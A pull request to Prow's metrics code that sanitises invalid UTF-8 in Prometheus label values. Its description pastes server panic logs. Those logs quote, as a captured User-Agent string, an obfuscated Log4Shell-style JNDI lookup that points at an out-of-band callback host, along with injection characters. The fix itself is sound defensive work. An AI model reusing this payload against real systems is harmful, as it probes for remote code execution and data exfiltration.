### PR TITLE
fix utf-8 parsing errors with metrics

### DIFF
--- a/pkg/metrics/http.go
+++ b/pkg/metrics/http.go
@@ -20,6 +20,7 @@ import (
 	"math"
 	"net/http"
 	"strconv"
+	"strings"
 	"time"
 
 	"github.com/prometheus/client_golang/prometheus"
@@ -142,9 +143,18 @@ func traceHandlerWithCustomTimer(simplifier simplifypath.Simplifier, httpRequest
 			trw := &traceResponseWriter{ResponseWriter: w, statusCode: http.StatusOK}
 			h.ServeHTTP(trw, r)
 			latency := timeSince(t)
-			labels := prometheus.Labels{"path": simplifier.Simplify(r.URL.Path), "method": r.Method, "status": strconv.Itoa(trw.statusCode), "user_agent": r.Header.Get("User-Agent")}
+			labels := prometheus.Labels{
+				"path":       validMetricLabel(simplifier.Simplify(r.URL.Path)),
+				"method":     r.Method,
+				"status":     strconv.Itoa(trw.statusCode),
+				"user_agent": validMetricLabel(r.Header.Get("User-Agent")),
+			}
 			httpRequestDuration.With(labels).Observe(latency.Seconds())
 			httpResponseSize.With(labels).Observe(float64(trw.size))
 		})
 	}
+}
+
+func validMetricLabel(value string) string {
+	return strings.ToValidUTF8(value, "")
 }


### PR DESCRIPTION
deck & metrics are panicking because of unhandled unicode errors


```
deck-7cd9fc546f-v6svp 2026/06/20 17:28:26 http: panic serving 35.191.34.197:33170: label user_agent: value "\xbf💡'\"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitkdlnvyljai342bd${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" is not valid UTF-8
deck-7cd9fc546f-v6svp goroutine 289296 [running]:
deck-7cd9fc546f-v6svp net/http.(*conn).serve.func1()
deck-7cd9fc546f-v6svp     net/http/server.go:1943 +0xd3
deck-7cd9fc546f-v6svp panic({0x31390a0?, 0xc002bd35d0?})
deck-7cd9fc546f-v6svp     runtime/panic.go:783 +0x132
deck-7cd9fc546f-v6svp github.com/prometheus/client_golang/prometheus.(*HistogramVec).With(0x33333a0?, 0xc0295fea20?)
deck-7cd9fc546f-v6svp     github.com/prometheus/client_golang@v1.22.0/prometheus/histogram.go:1273 +0x51
deck-7cd9fc546f-v6svp main.init.TraceHandler.traceHandlerWithCustomTimer.func1.1({0x3ec0ca0, 0xc050782f00}, 0xc0782663c0)
deck-7cd9fc546f-v6svp     sigs.k8s.io/prow/pkg/metrics/http.go:146 +0x32e
deck-7cd9fc546f-v6svp net/http.HandlerFunc.ServeHTTP(0x0?, {0x3ec0ca0?, 0xc050782f00?}, 0x4?)
deck-7cd9fc546f-v6svp     net/http/server.go:2322 +0x29
deck-7cd9fc546f-v6svp github.com/gorilla/csrf.(*csrf).ServeHTTP(0xc02bedfe00, {0x3ec0ca0, 0xc050782f00}, 0xc078266000)
deck-7cd9fc546f-v6svp     github.com/gorilla/csrf@v1.7.3/csrf.go:358 +0xb26
deck-7cd9fc546f-v6svp net/http.serverHandler.ServeHTTP({0xc020b181c0?}, {0x3ec0ca0?, 0xc050782f00?}, 0x6?)
deck-7cd9fc546f-v6svp     net/http/server.go:3340 +0x8e
deck-7cd9fc546f-v6svp net/http.(*conn).serve(0xc05407b3b0, {0x3ed74b8, 0xc03cc2d3e0})
deck-7cd9fc546f-v6svp     net/http/server.go:2109 +0x665
deck-7cd9fc546f-v6svp created by net/http.(*Server).Serve in goroutine 209
deck-7cd9fc546f-v6svp     net/http/server.go:3493 +0x485
deck-7cd9fc546f-dpjbs {"component":"deck","duration":"42.159232ms","file":"sigs.k8s.io/prow/pkg/spyglass/lenses/common/common.go:239","func":"sigs.k8s.io/prow/pkg/spyglass/lenses/common.FetchArtifacts","level":"info","msg":"Retrieved artifacts for gs/kubernetes-ci-logs/logs/ci-kubernetes-integration-master/2068384203732422656","severity":"info","time":"2026-06-20T17:28:26Z"}
deck-7cd9fc546f-v6svp {"component":"deck","file":"sigs.k8s.io/prow/pkg/simplifypath/simplify.go:48","func":"sigs.k8s.io/prow/pkg/simplifypath.(*simplifier).Simplify","level":"debug","msg":"Path not handled. This is a bug, please open an issue against the kubernetes-sigs/prow repository with this error message.","path":"/configured-jobs/kubernetes-csi/volume-data-source-validator","severity":"debug","time":"2026-06-20T17:28:26Z"}
deck-7cd9fc546f-v6svp 2026/06/20 17:28:26 http: panic serving 35.191.34.193:37938: label user_agent: value "\xbf💡'\"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitkdlnvyljai342bd${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" is not valid UTF-8
deck-7cd9fc546f-v6svp goroutine 286959 [running]:
deck-7cd9fc546f-v6svp net/http.(*conn).serve.func1()
deck-7cd9fc546f-v6svp     net/http/server.go:1943 +0xd3
deck-7cd9fc546f-v6svp panic({0x31390a0?, 0xc0243d20d0?})
deck-7cd9fc546f-v6svp     runtime/panic.go:783 +0x132
deck-7cd9fc546f-v6svp github.com/prometheus/client_golang/prometheus.(*HistogramVec).With(0x33333a0?, 0xc087c33a10?)
deck-7cd9fc546f-v6svp     github.com/prometheus/client_golang@v1.22.0/prometheus/histogram.go:1273 +0x51
deck-7cd9fc546f-v6svp main.init.TraceHandler.traceHandlerWithCustomTimer.func1.1({0x3ec0ca0, 0xc0507830e0}, 0xc078266a00)
deck-7cd9fc546f-v6svp     sigs.k8s.io/prow/pkg/metrics/http.go:146 +0x32e
deck-7cd9fc546f-v6svp net/http.HandlerFunc.ServeHTTP(0x0?, {0x3ec0ca0?, 0xc0507830e0?}, 0x4?)
deck-7cd9fc546f-v6svp     net/http/server.go:2322 +0x29
deck-7cd9fc546f-v6svp github.com/gorilla/csrf.(*csrf).ServeHTTP(0xc02bedfe00, {0x3ec0ca0, 0xc0507830e0}, 0xc078266640)
deck-7cd9fc546f-v6svp     github.com/gorilla/csrf@v1.7.3/csrf.go:358 +0xb26
deck-7cd9fc546f-v6svp net/http.serverHandler.ServeHTTP({0xc01b780f40?}, {0x3ec0ca0?, 0xc0507830e0?}, 0x6?)
deck-7cd9fc546f-v6svp     net/http/server.go:3340 +0x8e
deck-7cd9fc546f-v6svp net/http.(*conn).serve(0xc0277022d0, {0x3ed74b8, 0xc03cc2d3e0})
deck-7cd9fc546f-v6svp     net/http/server.go:2109 +0x665
deck-7cd9fc546f-v6svp created by net/http.(*Server).Serve in goroutine 209
deck-7cd9fc546f-v6svp     net/http/server.go:3493 +0x485
```